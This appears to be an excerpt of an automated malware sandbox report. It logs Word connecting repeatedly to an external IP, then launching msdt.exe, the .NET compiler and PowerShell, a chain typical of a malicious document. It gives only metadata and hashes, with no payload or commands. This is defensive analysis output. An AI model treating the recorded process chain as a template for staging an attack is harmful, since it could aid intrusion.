2022-07-21 12:34:55 UTC | 11 | IN | |
2022-07-21 12:34:55 UTC | 12 | IN | |
2022-07-21 12:34:55 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.3 | 49746 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:55 UTC | 12 | OUT | |
2022-07-21 12:34:56 UTC | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.3 | 49747 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:56 UTC | 14 | OUT | |
2022-07-21 12:34:57 UTC | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.3 | 49748 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:57 UTC | 15 | OUT | |
2022-07-21 12:34:59 UTC | 15 | IN | |
2022-07-21 12:34:59 UTC | 16 | IN | |
2022-07-21 12:34:59 UTC | 17 | IN | |
2022-07-21 12:34:59 UTC | 17 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.3 | 49749 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:01 UTC | 17 | OUT | |
2022-07-21 12:35:02 UTC | 17 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.3 | 49750 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:02 UTC | 18 | OUT | |
2022-07-21 12:35:03 UTC | 19 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.3 | 49751 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:03 UTC | 20 | OUT | |
2022-07-21 12:35:03 UTC | 20 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 14:34:42 |
Start date: | 21/07/2022 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2d0000 |
File size: | 1937688 bytes |
MD5 hash: | 0B9AB9B9C4DE429473D6450D4297A123 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 1 |
Start time: | 14:34:48 |
Start date: | 21/07/2022 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe40000 |
File size: | 466688 bytes |
MD5 hash: | EA19F4A0D18162BE3A0C8DAD249ADE8C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 13 |
Start time: | 14:35:05 |
Start date: | 21/07/2022 |
Path: | C:\Windows\SysWOW64\msdt.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 1508352 bytes |
MD5 hash: | 7F0C51DBA69B9DE5DDF6AA04CE3A69F4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Target ID: | 23 |
Start time: | 14:36:01 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1360000 |
File size: | 2170976 bytes |
MD5 hash: | 350C52F71BDED7B99668585C15D70EEA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | moderate |
Target ID: | 24 |
Start time: | 14:36:04 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1000000 |
File size: | 43176 bytes |
MD5 hash: | C09985AE74F0882F208D75DE27770DFA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 25 |
Start time: | 14:36:20 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1360000 |
File size: | 2170976 bytes |
MD5 hash: | 350C52F71BDED7B99668585C15D70EEA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | moderate |
Target ID: | 26 |
Start time: | 14:36:23 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1000000 |
File size: | 43176 bytes |
MD5 hash: | C09985AE74F0882F208D75DE27770DFA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 31 |
Start time: | 14:37:04 |
Start date: | 21/07/2022 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12e0000 |
File size: | 430592 bytes |
MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |